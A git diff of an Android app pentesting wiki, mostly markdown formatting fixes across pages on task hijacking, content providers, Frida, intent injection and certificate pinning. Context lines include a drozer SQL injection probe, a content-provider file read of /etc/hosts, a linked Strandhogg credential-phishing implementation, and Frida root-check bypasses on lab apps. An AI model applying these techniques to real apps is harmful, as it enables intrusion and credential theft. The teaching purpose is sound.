@@ -65,7 +65,7 @@ When the launchMode is set to `singleTask`, the Android system evaluates three p
 
 The victim needs to have the **malicious** **app** **installed** in his device. Then, he needs to **open** **it** **before** opening the **vulnerable** **application**. Then, when the **vulnerable** application is **opened**, the **malicious** **application** will be **opened** **instead**. If this malicious application presents the **same** **login** as the vulnerable application the **user won't have any means to know that he is putting his credentials in a malicious application**.
 
-**You can find an attack implemented here: **[**https://github.com/az0mb13/Task_Hijacking_Strandhogg**](https://github.com/az0mb13/Task_Hijacking_Strandhogg)****
+**You can find an attack implemented here:** [**https://github.com/az0mb13/Task\_Hijacking\_Strandhogg**](https://github.com/az0mb13/Task\_Hijacking\_Strandhogg)****
 
 ## Preventing task hijacking
 
diff --git a/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md b/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md
index 4d4ed55d..284ef6b5 100644
--- a/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md
+++ b/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md
@@ -13,9 +13,9 @@ Just **download** the **latest** version and execute it from the _**bin**_ folde
 jadx-gui
 ```
 
-Using the GUI you can perform **text search**, go to the **functions definitions** (_CTRL + left click_ on the function) and cross refs (_right click _-->_ Find Usage_)
+Using the GUI you can perform **text search**, go to the **functions definitions** (_CTRL + left click_ on the function) and cross refs (_right click_ --> _Find Usage_)
 
-If you **only want** the **java code **but without using a GUI a very easy way is to use the jadx cli tool:
+If you **only want** the **java code** but without using a GUI a very easy way is to use the jadx cli tool:
 
 ```
 jadx app.apk
@@ -40,12 +40,12 @@ GDA is also a powerful and fast reverse analysis platform. Which does not only s
 
 ### [Bytecode-Viewer](https://github.com/Konloch/bytecode-viewer/releases)
 
-Another **interesting tool to make a Static analysis is**: [**bytecode-viewer**](https://github.com/Konloch/bytecode-viewer/releases)**.** It allows you to decompile the APK using** several decompilers at the same time**. Then, you can see for example, 2 different Java decompilers and one Smali decompiler. It allows you also to **modify **the code:
+Another **interesting tool to make a Static analysis is**: [**bytecode-viewer**](https://github.com/Konloch/bytecode-viewer/releases)**.** It allows you to decompile the APK using **several decompilers at the same time**. Then, you can see for example, 2 different Java decompilers and one Smali decompiler. It allows you also to **modify** the code:
 
 ![](<../../.gitbook/assets/image (82).png>)
 
 If you modify the code, then you can **export it**.\
-One bad thing of bytecode-viewer is that it **doesn't have references** or** cross-references.**
+One bad thing of bytecode-viewer is that it **doesn't have references** or **cross-references.**
 
 ### ****[**Enjarify**](https://github.com/Storyyeller/enjarify)****
 
@@ -54,7 +54,7 @@ Enjarify is a tool for translating Dalvik bytecode to equivalent Java bytecode.
 
 ### [CFR](https://github.com/leibnitz27/cfr)
 
-CFR will decompile modern Java features - [including much of Java ](https://www.benf.org/other/cfr/java9observations.html)[9](https://github.com/leibnitz27/cfr/blob/master/java9stringconcat.html), [12](https://www.benf.org/other/cfr/switch_expressions.html) & [14](https://www.benf.org/other/cfr/java14instanceof_pattern), but is written entirely in Java 6, so will work anywhere! ([FAQ](https://www.benf.org/other/cfr/faq.html)) - It'll even make a decent go of turning class files from other JVM languages back into java!
+CFR will decompile modern Java features - [including much of Java ](https://www.benf.org/other/cfr/java9observations.html)[9](https://github.com/leibnitz27/cfr/blob/master/java9stringconcat.html), [12](https://www.benf.org/other/cfr/switch\_expressions.html) & [14](https://www.benf.org/other/cfr/java14instanceof\_pattern), but is written entirely in Java 6, so will work anywhere! ([FAQ](https://www.benf.org/other/cfr/faq.html)) - It'll even make a decent go of turning class files from other JVM languages back into java!
 
 That JAR file can be used as follows:
 
diff --git a/mobile-apps-pentesting/android-app-pentesting/avd-android-virtual-device.md b/mobile-apps-pentesting/android-app-pentesting/avd-android-virtual-device.md
index d93a533b..8b6dfa30 100644
--- a/mobile-apps-pentesting/android-app-pentesting/avd-android-virtual-device.md
+++ b/mobile-apps-pentesting/android-app-pentesting/avd-android-virtual-device.md
@@ -4,7 +4,7 @@ Thank you very much to [**@offsecjay**](https://twitter.com/offsecjay) for his h
 
 ## What is
 
-Android Studio allows to** run virtual machines of Android that you can use to test APKs**. In order to use them you will need:
+Android Studio allows to **run virtual machines of Android that you can use to test APKs**. In order to use them you will need:
 
 * The **Android SDK tools** - [Download here](https://developer.android.com/studio/releases/sdk-tools).
 * Or **Android Studio** (with Android SDK tools) - [Download here](https://developer.android.com/studio).
@@ -23,25 +23,25 @@ brew install openjdk@8
 
 ### Prepare Virtual Machine
 
-If you installed Android Studio, you can just open the main project view and access: _**Tools **_--> _**AVD Manager.**_ 
+If you installed Android Studio, you can just open the main project view and access: _**Tools**_ --> _**AVD Manager.**_&#x20;
 
 ![](<../../.gitbook/assets/image (330).png>)
 
-Then, click on _**Create Virtual Device**_, _**select **the phone you want to use_ and click on _**Next.**_\
+Then, click on _**Create Virtual Device**_, _**select** the phone you want to use_ and click on _**Next.**_\
 _****_In the current view you are going to be able to **select and download the Android image** that the phone is going to run:
 
 ![](<../../.gitbook/assets/image (331).png>)
 
-So, select it and click on _**Download **_**(**now wait until the image is downloaded).\
-Once the image is downloaded, just select _**Next **_and _**Finish**_.
+So, select it and click on _**Download**_** (**now wait until the image is downloaded).\
+Once the image is downloaded, just select _**Next**_ and _**Finish**_.
 
 ![](<../../.gitbook/assets/image (332).png>)
 
-The virtual machine will be created. Now** every time that you access AVD manager it will be present**.
+The virtual machine will be created. Now **every time that you access AVD manager it will be present**.
 
 ### Run Virtual Machine
 
-In order to **run **it just press the _**Start button**_.
+In order to **run** it just press the _**Start button**_.
 
 ![](<../../.gitbook/assets/image (334).png>)
 
@@ -111,7 +111,7 @@ Once you have decide the name of the device you want to use, you need to **decid
 C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\sdkmanager.bat --list
 ```
 
-And **download **the one (or all) you want to use with:
+And **download** the one (or all) you want to use with:
 
 ```bash
 C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\sdkmanager.bat "platforms;android-28" "system-images;android-28;google_apis;x86_64"
@@ -141,8 +141,8 @@ At this moment you have decided the device you want to use and you have download
 C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat -v create avd -k "system-images;android-28;google_apis;x86_64" -n "AVD9" -d "Nexus 5X"
 ```
 
-In the last command **I created a VM named **"_AVD9_" using the **device **"_Nexus 5X_" and the **Android image** "_system-images;android-28;google_apis;x86\_64_".\
-Now you can** list the virtual machines** you have created with: 
+In the last command **I created a VM named** "_AVD9_" using the **device** "_Nexus 5X_" and the **Android image** "_system-images;android-28;google\_apis;x86\_64_".\
+Now you can **list the virtual machines** you have created with:&#x20;
 
 ```bash
 C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat list avd
@@ -161,7 +161,7 @@ The following Android Virtual Devices could not be loaded:
 
 ### Run Virtual Machine
 
-We have already seen how you can list the created virtual machines, but** you can also list them using**:
+We have already seen how you can list the created virtual machines, but **you can also list them using**:
 
 ```bash
 C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -list-avds
@@ -184,7 +184,7 @@ C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -avd "AVD9" -ht
 
 ### Command line options
 
-However there are **a lot of different command line useful options** that you can use to initiate a virtual machine. Below you can find some interesting options but can** **[**find a complete list here**](https://developer.android.com/studio/run/emulator-commandline)
+However there are **a lot of different command line useful options** that you can use to initiate a virtual machine. Below you can find some interesting options but can **** [**find a complete list here**](https://developer.android.com/studio/run/emulator-commandline)
 
 #### Boot
 
@@ -208,11 +208,11 @@ However there are **a lot of different command line useful options** that you ca
 
 ## Install Burp certificate on a Virtual Machine
 
-First of all you need to download the Der certificate from Burp. You can do this in _**Proxy **_--> _**Options **_--> _**Import / Export CA certificate**_
+First of all you need to download the Der certificate from Burp. You can do this in _**Proxy**_ --> _**Options**_ --> _**Import / Export CA certificate**_
 
 ![](<../../.gitbook/assets/image (367) (1).png>)
 
-**Export the certificate in Der format** and lets **transform **it to a form that **Android **is going to be able to **understand. **Note that **in order to configure the burp certificate on the Android machine in AVD** you need to **run **this machine **with** the **`-writable-system`** option.\
+**Export the certificate in Der format** and lets **transform** it to a form that **Android** is going to be able to **understand.** Note that **in order to configure the burp certificate on the Android machine in AVD** you need to **run** this machine **with** the **`-writable-system`** option.\
 For example you can run it like:
 
 ```bash
diff --git a/mobile-apps-pentesting/android-app-pentesting/content-protocol.md b/mobile-apps-pentesting/android-app-pentesting/content-protocol.md
index 66badd44..c8f3e47c 100644
--- a/mobile-apps-pentesting/android-app-pentesting/content-protocol.md
+++ b/mobile-apps-pentesting/android-app-pentesting/content-protocol.md
@@ -52,9 +52,9 @@ Row: 88 _id=89, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSes
 ...
 ```
 
-### The Chrome CVE-2020-6516 Same-Origin-Policy bypass <a href="cve-2020-6516" id="cve-2020-6516"></a>
+### The Chrome CVE-2020-6516 Same-Origin-Policy bypass <a href="#cve-2020-6516" id="cve-2020-6516"></a>
 
-The _Same Origin Policy_ (SOP) \[[12](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy)] in browsers dictates that Javascript content of URL A will only be able to access content at URL B if the following URL attributes remain the same for A and B:
+The _Same Origin Policy_ (SOP) \[[12](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin\_policy)] in browsers dictates that Javascript content of URL A will only be able to access content at URL B if the following URL attributes remain the same for A and B:
 
 * The protocol e.g. `https` vs. `http`
 * The domain e.g. `www.example1.com` vs. `www.example2.com`
@@ -97,4 +97,4 @@ A proof-of-concept is pretty straightforward. An HTML document that uses `XMLHtt
 </html>
 ```
 
-**Information taken from this writeup: **[**https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/**](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/)****
+**Information taken from this writeup:** [**https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/**](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/)****
diff --git a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
index 98585afc..51cce54d 100644
--- a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
+++ b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
@@ -2,7 +2,7 @@
 
 ## Intro
 
-A content provider component **supplies data from one application to others** on request. Such requests are handled by the methods of the ContentResolver class. A content provider can use different ways to store its data and the data can be **stored **in a **database**, in **files**, or even over a **network**.
+A content provider component **supplies data from one application to others** on request. Such requests are handled by the methods of the ContentResolver class. A content provider can use different ways to store its data and the data can be **stored** in a **database**, in **files**, or even over a **network**.
 
 It has to be declared inside the _Manifest.xml_ file. Example:
 
@@ -12,7 +12,7 @@ It has to be declared inside the _Manifest.xml_ file. Example:
 </provider>
 ```
 
-In this case, it's necessary the permission `READ_KEYS `to access `content://com.mwr.example.sieve.DBContentProvider/Keys`\
+In this case, it's necessary the permission `READ_KEYS` to access `content://com.mwr.example.sieve.DBContentProvider/Keys`\
 (_Also, notice that in the next section we are going to access `/Keys/` which isn't protected, that's because the developer got confused and protected `/Keys` but declared `/Keys/`_)
 
 **Maybe you can access private data or exploit some vulnerability (SQL Injection or Path Traversal).**
@@ -41,7 +41,7 @@ dz> run app.provider.info -a com.mwr.example.sieve
   Grant Uri Permissions: False
 ```
 
-We can **reconstruct **part of the content **URIs **to access the **DBContentProvider**, because we know that they must begin with “_content://_” and the information obtained by Drozer inside Path:_ /Keys_.
+We can **reconstruct** part of the content **URIs** to access the **DBContentProvider**, because we know that they must begin with “_content://_” and the information obtained by Drozer inside Path: _/Keys_.
 
 Drozer can **guess and try several URIs**:
 
@@ -57,11 +57,11 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords
 content://com.mwr.example.sieve.DBContentProvider/Passwords/
 ```
 
-You should also check the **ContentProvider code **to search for queries: 
+You should also check the **ContentProvider code** to search for queries:&#x20;
 
 ![](<../../../.gitbook/assets/image (121) (1) (1).png>)
 
-Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate `method:
+Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method:
 
 ![](<../../../.gitbook/assets/image (186).png>)
 
@@ -69,10 +69,10 @@ The query will be like: `content://name.of.package.class/declared_name`
 
 ## **Database-backed Content Providers**
 
-Probably most of the Content Providers are used as **interface **for a **database**. Therefore, if you can access it you could be able to **extract, update, insert and delete** information. \
+Probably most of the Content Providers are used as **interface** for a **database**. Therefore, if you can access it you could be able to **extract, update, insert and delete** information. \
 Check if you can **access sensitive information** or try to change it to **bypass authorisation** mechanisms.
 
-When checking the code of the Content Provider **look **also for **functions **named like: _query, insert, update and delete_:
+When checking the code of the Content Provider **look** also for **functions** named like: _query, insert, update and delete_:
 
 ![](<../../../.gitbook/assets/image (187).png>)
 
@@ -94,7 +94,7 @@ email: incognitoguy50@gmail.com
 
 ### Insert content
 
-Quering the database you will learn the** name of the columns**, then, you could be able to insert data in the DB:
+Quering the database you will learn the **name of the columns**, then, you could be able to insert data in the DB:
 
 ![](<../../../.gitbook/assets/image (188).png>)
 
@@ -114,12 +114,12 @@ Knowing the name of the columns you could also **modify the entries**:
 
 ### **SQL Injection**
 
-It is simple to test for SQL injection** (SQLite)** by manipulating the **projection **and **selection fields **that are passed to the content provider.\
-When quering the Content Provider there are 2 interesting arguments to search for information: _--selection_ and_ --projection_:
+It is simple to test for SQL injection **(SQLite)** by manipulating the **projection** and **selection fields** that are passed to the content provider.\
+When quering the Content Provider there are 2 interesting arguments to search for information: _--selection_ and _--projection_:
 
 ![](<../../../.gitbook/assets/image (192).png>)
 
-You can try to **abuse** this **parameters **to test for **SQL injections**:
+You can try to **abuse** this **parameters** to test for **SQL injections**:
 
 ```
 dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'" 
@@ -173,7 +173,7 @@ dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc
 
 ### **Path Traversal**
 
-If you can access files, you can try to abuse a Path Traversal (in this case this isn't necessary but you can try to use "_../_" and similar tricks). 
+If you can access files, you can try to abuse a Path Traversal (in this case this isn't necessary but you can try to use "_../_" and similar tricks).&#x20;
 
 ```
 dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts 
@@ -192,5 +192,5 @@ Vulnerable Providers:
 
 ## References
 
-* [https://www.tutorialspoint.com/android/android_content_providers.htm](https://www.tutorialspoint.com/android/android_content_providers.htm)
+* [https://www.tutorialspoint.com/android/android\_content\_providers.htm](https://www.tutorialspoint.com/android/android\_content\_providers.htm)
 * [https://manifestsecurity.com/android-application-security-part-15/](https://manifestsecurity.com/android-application-security-part-15/)
diff --git a/mobile-apps-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md b/mobile-apps-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md
index dbbd0003..5b79bfaa 100644
--- a/mobile-apps-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md
+++ b/mobile-apps-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md
@@ -1,6 +1,6 @@
 # Exploiting a debuggeable applciation
 
-**Information copied from **[**https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications/#article**](https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications/#article)****
+**Information copied from** [**https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications/#article**](https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications/#article)****
 
 In the previous article, we have seen how to debug Java applications using a little tool called JDB. In this article, we will apply the same logic to exploit Android apps, if they are flagged as debuggable. If an application is flagged as debuggable, we can inject our own code to execute it in the context of the vulnerable application process.
 
diff --git a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/README.md b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/README.md
index 83a55278..2e843a8c 100644
--- a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/README.md
+++ b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/README.md
@@ -46,7 +46,7 @@ Follow the[ link to read it.](frida-tutorial-2.md)
 **APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk)
 
 Follow the [link to read it](owaspuncrackable-1.md).\
-**You can find some Awesome Frida scripts here: **[**https://codeshare.frida.re/**](https://codeshare.frida.re)****
+**You can find some Awesome Frida scripts here:** [**https://codeshare.frida.re/**](https://codeshare.frida.re)****
 
 ## Fast Examples
 
@@ -129,7 +129,7 @@ Hook android `.onCreate()`
 
 ### Hooking functions with parameters and retrieving the value
 
- Hooking a decryption function. Print the input, call the original function decrypt the input and finally, print the plain data:
+&#x20;Hooking a decryption function. Print the input, call the original function decrypt the input and finally, print the plain data:
 
 ```javascript
   function getString(data){
@@ -176,7 +176,7 @@ my_class.fun.overload("java.lang.String").implementation = function(x){ //hookin
 
 If you want to extract some attribute of a created object you can use this.
 
-In this example you are going to see how to get the object of the class my_activity and how to call the function .secret() that will print a private attribute of the object:
+In this example you are going to see how to get the object of the class my\_activity and how to call the function .secret() that will print a private attribute of the object:
 
 ```javascript
 Java.choose("com.example.a11x256.frida_test.my_activity" , {
diff --git a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md
index fbc630bf..7fa263cd 100644
--- a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md
+++ b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md
@@ -125,6 +125,6 @@ Java.perform(function() {
 
 ## Important
 
-In this tutorial you have hooked methods using the name of the mathod and _.implementation_. But if there were** more than one method **with the same name, you will need to **specify the method** that you want to hook** indicating the type of the arguments**.
+In this tutorial you have hooked methods using the name of the mathod and _.implementation_. But if there were **more than one method** with the same name, you will need to **specify the method** that you want to hook **indicating the type of the arguments**.
 
 You can see that in [the next tutorial](frida-tutorial-2.md).
diff --git a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md
index 1f27310f..c19c0695 100644
--- a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md
+++ b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md
@@ -3,11 +3,11 @@
 **From**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\
 **APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk)
 
-## Solution 1 
+## Solution 1&#x20;
 
-Based in [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1) 
+Based in [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)&#x20;
 
-**Hook the **_**exit() **_function and **decrypt function** so it print the flag in frida console when you press verify:
+**Hook the **_**exit()**_ function and **decrypt function** so it print the flag in frida console when you press verify:
 
 ```javascript
 Java.perform(function () {
@@ -48,9 +48,9 @@ Java.perform(function () {
 
 ## Solution 2
 
-Based in [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1) 
+Based in [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)&#x20;
 
-**Hook rootchecks **and decrypt function so it print the flag in frida console when you press verify:
+**Hook rootchecks** and decrypt function so it print the flag in frida console when you press verify:
 
 ```javascript
 Java.perform(function () {
diff --git a/mobile-apps-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md b/mobile-apps-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md
index e6d06b14..1ed185bf 100644
--- a/mobile-apps-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md
+++ b/mobile-apps-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md
@@ -14,7 +14,7 @@ Reading the java code:
 
 ![](<../../.gitbook/assets/image (47).png>)
 
-It looks like the function that is going print the flag is **m(). **
+It looks like the function that is going print the flag is **m().**&#x20;
 
 ## **Smali changes**
 
@@ -60,7 +60,7 @@ A forth way is to add an instruction to move to value of v9(1000000) to v0 _(thi
 
 ## Solution
 
-Make the application run the loop 100000 times when you win the first time. To do so, you only need to create the** :goto\_6 **loop and make the application **junp there if **_**this.o**_** does not value 100000**:
+Make the application run the loop 100000 times when you win the first time. To do so, you only need to create the **:goto\_6** loop and make the application **junp there if **_**this.o**_** does not value 100000**:
 
 ![](<../../.gitbook/assets/image (59).png>)
 
diff --git a/mobile-apps-pentesting/android-app-pentesting/inspeckage-tutorial.md b/mobile-apps-pentesting/android-app-pentesting/inspeckage-tutorial.md
index cbc4c19c..5f6ffe30 100644
--- a/mobile-apps-pentesting/android-app-pentesting/inspeckage-tutorial.md
+++ b/mobile-apps-pentesting/android-app-pentesting/inspeckage-tutorial.md
@@ -1,8 +1,8 @@
 # Inspeckage Tutorial
 
-**Tutorial copied from **[**https://infosecwriteups.com/genymotion-xposed-inspeckage-89f0c8decba7**](https://infosecwriteups.com/genymotion-xposed-inspeckage-89f0c8decba7)****
+**Tutorial copied from** [**https://infosecwriteups.com/genymotion-xposed-inspeckage-89f0c8decba7**](https://infosecwriteups.com/genymotion-xposed-inspeckage-89f0c8decba7)****
 
-### Install Xposed Framework <a href="ef45" id="ef45"></a>
+### Install Xposed Framework <a href="#ef45" id="ef45"></a>
 
 1. Download Xposed Installer APK from [here](https://forum.xda-developers.com/attachments/xposedinstaller\_3-1-5-apk.4393082/)
 2. Download Xposed Framework zip from [here](https://dl-xda.xposed.info/framework/sdk25/x86/xposed-v89-sdk25-x86.zip)
@@ -18,13 +18,13 @@ Make sure the device is online for adb
 
 Drag and drop the Xposed framework zip file (`xposed-vXX-sdkXX-x86.zip`) to your virtual device display to flash the device.
 
-Drag and drop Xposed Installer APK (`XposedInstaller_*.apk`). This should install and launch _Xposed Installer _application. At this stage, it will display that the Xposed framework is installed but disabled:![](https://miro.medium.com/max/30/0\*0ddJI69QvpxC8rXq.png?q=20)
+Drag and drop Xposed Installer APK (`XposedInstaller_*.apk`). This should install and launch _Xposed Installer_ application. At this stage, it will display that the Xposed framework is installed but disabled:![](https://miro.medium.com/max/30/0\*0ddJI69QvpxC8rXq.png?q=20)
 
 ![](https://miro.medium.com/max/700/0\*0ddJI69QvpxC8rXq.png)
 
 Reboot the device with `adb reboot` command. **Do not reboot from **_**Xposed Installer**_** as this will freeze the device.**
 
-![](https://miro.medium.com/max/657/1\*V_jl42vdOcJLXvS0riI7Gg.png)
+![](https://miro.medium.com/max/657/1\*V\_jl42vdOcJLXvS0riI7Gg.png)
 
 Launch _Xposed installer_. It should display “Xposed Framework version XX is active”
 
@@ -36,14 +36,14 @@ After installing, Go to Xposed Installer → Modules→ Activate the Module →
 
 ![](https://miro.medium.com/max/623/1\*7sO6IX46hciTBUtWoyLEFQ.png)
 
-### Dynamic Analysis with Inspeckage <a href="7856" id="7856"></a>
+### Dynamic Analysis with Inspeckage <a href="#7856" id="7856"></a>
 
 After, Successful installing of Inspeckage and Xposed Installer. Now we can hook any application with Inspeackage. To do this follow the below steps
 
 1. Launch the Inspeckage Application from the application drawer
 2. Click on the “Choose target” text and select the target application
 
-![](https://miro.medium.com/max/700/1\*J5J_rCHOC0ga0YJ5kbwqbQ.png)
+![](https://miro.medium.com/max/700/1\*J5J\_rCHOC0ga0YJ5kbwqbQ.png)
 
 3\. Then forward VD local-host port to main machine using adb
 
diff --git a/mobile-apps-pentesting/android-app-pentesting/intent-injection.md b/mobile-apps-pentesting/android-app-pentesting/intent-injection.md
index acbda62a..08802820 100644
--- a/mobile-apps-pentesting/android-app-pentesting/intent-injection.md
+++ b/mobile-apps-pentesting/android-app-pentesting/intent-injection.md
@@ -1,12 +1,12 @@
 # Intent Injection
 
-**Research taken from **[**https://blog.oversecured.com/Android-Access-to-app-protected-components/**](https://blog.oversecured.com/Android-Access-to-app-protected-components/)****
+**Research taken from** [**https://blog.oversecured.com/Android-Access-to-app-protected-components/**](https://blog.oversecured.com/Android-Access-to-app-protected-components/)****
 
 ## Introduction
 
 This vulnerability resembles **Open Redirect in web security**. Since class `Intent` is `Parcelable`, **objects belonging to this class** can be **passed** as **extra** **data** in another `Intent` object. \
 Many developers make **use** of this **feature** and create **proxy** **components** (activities, broadcast receivers and services) that **take an embedded Intent and pass it to dangerous methods** like `startActivity(...)`, `sendBroadcast(...)`, etc. \
-This is dangerous because **an attacker can force the app to launch a non-exported component that cannot be launched directly from another app**, or to grant the attacker access to its content providers. **`WebView`** also sometimes changes a **URL from a string to an `Intent`** object, using the `Intent.parseUri(...)` method, and passes it to `startActivity(...)`. 
+This is dangerous because **an attacker can force the app to launch a non-exported component that cannot be launched directly from another app**, or to grant the attacker access to its content providers. **`WebView`** also sometimes changes a **URL from a string to an `Intent`** object, using the `Intent.parseUri(...)` method, and passes it to `startActivity(...)`.&#x20;
 
 {% hint style="info" %}
 As summary: If an attacker can send an Intent that is being insecurely executed he can potentially access not exported components and abuse them.
@@ -67,9 +67,9 @@ In order to escalate the impact of this vulnerability you need to **find other v
 
 ### Escalation of attacks via Content Providers
 
-Besides access to arbitrary components of the original app, the **attacker can attempt to gain access to those of the vulnerable app’s Content Providers **that satisfy the following conditions:
+Besides access to arbitrary components of the original app, the **attacker can attempt to gain access to those of the vulnerable app’s Content Providers** that satisfy the following conditions:
 
-* it must be** non-exported** (otherwise it **could be attacked directly**, without using the vulnerability we are discussing in this article)
+* it must be **non-exported** (otherwise it **could be attacked directly**, without using the vulnerability we are discussing in this article)
 * it must have the **`android:grantUriPermissions`** flag set to **`true`**.
   * `android:grantUriPermissions="true"` indicates that your Java code can use `FLAG_GRANT_READ_URI_PERMISSION` and `FLAG_GRANT_WRITE_URI_PERMISSION` for **any `Uri` served by that `ContentProvider`**.
   * `android:grantUriPermissions="false"` indicates that **only the `Uri` values specified by child `<grant-uri-permission>`** elements can be used with `FLAG_GRANT_READ_URI_PERMISSION` and `FLAG_GRANT_WRITE_URI_PERMISSION`.
@@ -261,7 +261,7 @@ We therefore recommend checking that an activity is exported before it is launch
 
 ### Other ways of creating insecure intents
 
-Some app developers implement their **own intent parsers **(often to handle **deeplinks** or push messages), using e.g. **JSON** objects, strings or byte arrays, which either do not differ from the default or else present a great danger, because they may expand **`Serializable`** and `Parcelable` objects and they also allow insecure flags to be set. The security researcher may also encounter more exotic versions of intent creation, such as casting a byte array to a `Parcel` and then reading an intent from it
+Some app developers implement their **own intent parsers** (often to handle **deeplinks** or push messages), using e.g. **JSON** objects, strings or byte arrays, which either do not differ from the default or else present a great danger, because they may expand **`Serializable`** and `Parcelable` objects and they also allow insecure flags to be set. The security researcher may also encounter more exotic versions of intent creation, such as casting a byte array to a `Parcel` and then reading an intent from it
 
 ```java
 Uri deeplinkUri = getIntent().getData();
diff --git a/mobile-apps-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md b/mobile-apps-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md
index ddf2adde..36cbcf0a 100644
--- a/mobile-apps-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md
+++ b/mobile-apps-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md
@@ -4,7 +4,7 @@ Some applications don't like user downloaded certificates, so in order to inspec
 
 ## Automatic
 
-The tool [**https://github.com/shroudedcode/apk-mitm**](https://github.com/shroudedcode/apk-mitm) will **automatically **make the necessary changes to the application to start capturing the requests and will also disable certificate pinning (if any).
+The tool [**https://github.com/shroudedcode/apk-mitm**](https://github.com/shroudedcode/apk-mitm) will **automatically** make the necessary changes to the application to start capturing the requests and will also disable certificate pinning (if any).
 
 ## Manual
 
@@ -24,7 +24,7 @@ After adding:
 
 ![](../../.gitbook/assets/img11.png)
 
-Now go into the **res/xml** folder & create/modify a file named network_security_config.xml with the following contents:
+Now go into the **res/xml** folder & create/modify a file named network\_security\_config.xml with the following contents:
 
 ```markup
 <network-security-config>  
diff --git a/mobile-apps-pentesting/android-app-pentesting/react-native-application.md b/mobile-apps-pentesting/android-app-pentesting/react-native-application.md
index 63b17223..4889206c 100644
--- a/mobile-apps-pentesting/android-app-pentesting/react-native-application.md
+++ b/mobile-apps-pentesting/android-app-pentesting/react-native-application.md
@@ -1,6 +1,6 @@
 # React Native Application
 
-**Information copied from **[**https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7**](https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7)****
+**Information copied from** [**https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7**](https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7)****
 
 React Native is a **mobile application framework** that is most commonly used to develop applications for **Android** and **iOS** by enabling the use of React and native platform capabilities. These days, it’s become increasingly popular to use React across platforms.\
 But most of the time, the core logic of the application lies in the React Native **JavaScript that can be obtained** without needing to use dex2jar.
@@ -40,6 +40,6 @@ Open the **index.html** file in **Google Chrome**. Open up the Developer Toolbar
 
